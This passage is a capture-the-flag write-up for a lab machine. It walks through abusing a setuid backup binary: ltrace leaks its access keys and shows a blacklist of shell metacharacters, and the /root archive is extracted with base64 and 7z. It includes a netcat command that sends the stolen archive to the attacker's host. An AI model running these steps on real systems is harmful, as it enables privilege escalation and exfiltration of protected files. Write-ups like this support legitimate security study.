_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[!] Ah-ah-ah! You didn't say the magic word!
$
To see the how this binary works, I have used"ltrace"
ltrace backup test1 test2 test3
strncpy(0xffc35a38, "test2", 100) = 0xffc35a38
strcpy(0xffc35a21, "/") = 0xffc35a21
strcpy(0xffc35a2d, "/") = 0xffc35a2d
strcpy(0xffc359b7, "/e") = 0xffc359b7
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x990f410
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x990f410) = 0xffc355cf
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("test2", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x990f410) = 0xffc355cf
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("test2", "45fac180e9eee72f4fd2d9386ea7033e"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x990f410) = 0xffc355cf
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("test2", "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x990f410) = 0xffc355cf
strcspn("\n", "\n") = 0
strcmp("test2", "") = 1
fgets(nil, 1000, 0x990f410) = 0
strcpy(0xffc34608, "Ah-ah-ah! You didn't say the mag"...) = 0xffc34608
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Ah-ah-ah! You didn't say the mag"... [!] Ah-ah-ah! You didn't say the magic word!
) = 58
This is the place we need to look next “/etc/myplace/keys”
cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
With the ltrace output you can the second parameter is getting compared with each values.
strcmp("test2", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
strcmp("test2", "45fac180e9eee72f4fd2d9386ea7033e"...) = 1
strcmp("test2", "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
I am going to repalce the second parameter with any of these values and test.
backup test1 a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 test3
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[+] Validated access token
[+] Starting archiving test3
[!] The target path doesn't exist
The results says it does not exist. Lets put a file which exist and compare. I am going to create a test file and run the program again.
touch /tmp/rchitect
$ backup test1 a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect
[+] Validated access token
[+] Starting archiving /tmp/rchitect
[+] Finished! Encoded backup is below:
UEsDBAoACQAAAK4QhFQAAAAADAAAAAAAAAAMABwAdG1wL3JjaGl0ZWN0VVQJAANXREpiV0RKYnV4CwABBOgDAAAE6AMAAAEjLMPWRolSrtwRaVBLBwgAAAAADAAAAAAAAABQSwECHgMKAAkAAACuEIRUAAAAAAwAAAAAAAAADAAYAAAAAAAAAAAApIEAAAAAdG1wL3JjaGl0ZWN0VVQFAANXREpidXgLAAEE6AMAAAToAwAAUEsFBgAAAAABAAEAUgAAAGIAAAAAAA==
So these tests show how the backup program works. It backups the file or folder we put on third parameter and generate base64 value.
Let’s try “ltrace” again with new file which we have created.
strcmp("a01a6aa5aaf1d7729f35c8278daae30f"..., "") = 1
fgets(nil, 1000, 0x8d0a410) = 0
strstr("/tmp/rchitect", "..") = nil
strstr("/tmp/rchitect", "/root") = nil
strchr("/tmp/rchitect", ';') = nil
strchr("/tmp/rchitect", '&') = nil
strchr("/tmp/rchitect", '`') = nil
strchr("/tmp/rchitect", '$') = nil
strchr("/tmp/rchitect", '|') = nil
strstr("/tmp/rchitect", "//") = nil
strcmp("/tmp/rchitect", "/") = 1
strstr("/tmp/rchitect", "/etc") = nil
We can not put the “/root/root.txt” as the “/root” is already on comparison list
strstr("/tmp/rchitect", “/root”) = nil
Many more values are also getting compare , however the ~ symbol which we use for ~/home is not not getting compare. Lets chnage the ENV variable to use this to /root
env
LESSOPEN=| /usr/bin/lesspipe %s
USER=tom
LANGUAGE=en_GB:en
SHLVL=2
HOME=/home/tom
OLDPWD=/
LOGNAME=tom
_=/tmp/rchitect
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LANG=en_GB.UTF-8
LS_COLORS=
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/usr/local/bin
export HOME=/root/
export HOME=/root/
env
env
LESSOPEN=| /usr/bin/lesspipe %s
USER=tom
LANGUAGE=en_GB:en
SHLVL=2
HOME=/root/
OLDPWD=/
LOGNAME=tom
_=HOME=/root/
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LANG=en_GB.UTF-8
LS_COLORS=
SHELL=/bin/bash
LESSCLOSE=/usr/bin/less
Now run the backup script again
backup test1 a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 "~"
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[+] Validated access token
[+] Starting archiving ~
[+] Finished! Encoded backup is below:
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
Even though backup was showing generated ,It did not work as it matches with string compare parameters in script
gets(nil, 1000, 0x85c5410) = 0
strstr("~", "..") = nil
strstr("~", "/root") = nil
strchr("~", ';') = nil
strchr("~", '&') = nil
strchr("~", '`') = nil
strchr("~", '$') = nil
strchr("~", '|') = nil
strstr("~", "//") = nil
strcmp("~", "/") = 1
strstr("~", "/etc") = nil
strcpy(0xffeac15c, "~") = 0xffeac15c
I have tried one more combination and still does not work due to this sting compare feature.
backup test1 a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 ~
ltrace results
strcspn("\n", "\n") = 0
strcmp("a01a6aa5aaf1d7729f35c8278daae30f"..., "") = 1
fgets(nil, 1000, 0x87e3410) = 0
strstr("/root/", "..") = nil
strstr("/root/", "/root") = "/root/"
I have decided to check more on this script, I have ran ltrace command with 3 dummy values again
ltrace backup test1 test2 test3
__libc_start_main(0x80489fd, 4, 0xffd7a9d4, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("test1", "-q") = 1
puts("\n\n\n ________________"...
the script takes the uid of user and setit to 0. Then compare the first arguement with “-q”
echo "1" > /tmp/rchitect
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect
UEsDBAoACQAAAEcQhVRT/FFnDgAAAAIAAAAMABwAdG1wL3JjaGl0ZWN0VVQJAAMVlUtiekRKYnV4CwABBOgDAAAE6AMAAESun+H5fObS2erRsWibUEsHCFP8UWcOAAAAAgAAAFBLAQIeAwoACQAAAEcQh VRT/FFnDgAAAAIAAAAMABgAAAAAAAEAAACkgQAAAAB0bXAvcmNoaXRlY3RVVAUAAxWVS2J1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBSAAAAZAAAAAAA$
ltrace backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xffca8228, "a01a6aa5aaf1d7729f35c8278daae30f"..., 100) = 0xffca8228
strcpy(0xffca8211, "/") = 0xffca8211
strstr("/tmp/rchitect", "..") = nil
strstr("/tmp/rchitect", "/root") = nil
strchr("/tmp/rchitect", ';') = nil
strchr("/tmp/rchitect", '&') = nil
strchr("/tmp/rchitect", '`') = nil
strchr("/tmp/rchitect", '$') = nil
strchr("/tmp/rchitect", '|') = nil
strstr("/tmp/rchitect", "//") = nil
strcmp("/tmp/rchitect", "/") = 1
strstr("/tmp/rchitect", "/etc") = nil
Unziping the archive
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp/rchitect | base64 -d > /tmp/back1.zip
cd /tmp
cd /tmp
ls
ls
back1.zip
mongodb-27017.sock
rchitect
systemd-private-92ed3baa8e5a4f8eb1ba61458d12cf56-systemd-timesyncd.service-as2fFE
vmware-root
unzip back1.zip
unzip back1.zip
Archive: back1.zip
magicword
extracting: tmp/rchitect
Same way I am going to try backup /root. Initially it was saying invalid zip file while we do backup of /root.
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root | base64 -d > /tmp/root1.zip
base64: invalid input
Lets try below format to make it a zip file
backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root | tail -1 | base64 -d > /tmp/root1.zip backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root | tail -1 | base64 -d > /tmp/root1.zip cd /tmp cd /tmp unzip root1.zip unzip root1.zip Archive: root1.zip skipping: root.txt need PK compat. v5.1 (can do v4.6)
Now transfer this file to Kali VM and use 7z to extract it
On Node machine
nc 10.10.14.2 4444 < /tmp/root1.zip
On kali machine
nc -lnvp 4444 > root1.zip 1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.58] 36426
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ ls
backup root root1.zip
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ 7z x root1.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs AMD Ryzen 9 5900HS with Radeon Graphics (A50F00),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root1.zip
--
Path = root1.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed):
Everything is Ok
Size: 2584
Compressed: 1141
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ ls
backup root root1.zip root.txt
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ head -10 root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
We have the root flag now.
Lessons Learned Link to heading
For the initail user crendentials, we need to review the website in BURP/firefox developer mode to understand the working of the program running. curl -s command is used .
Familarize with bruteforce programs like john and Hydra hich is really usefful for exams like OSCP.
How to connect mongodb database and other databases like oracle,mysql and basic commands to see the details of database should be learned.
For privilege escalation from “mark” to “tom” the actual help on understanding how a program excecution happens. “ltrace” command was big help here.
Finally using the 7z instead of unzip was little tricky here which even i have learned through some other forum/writeups.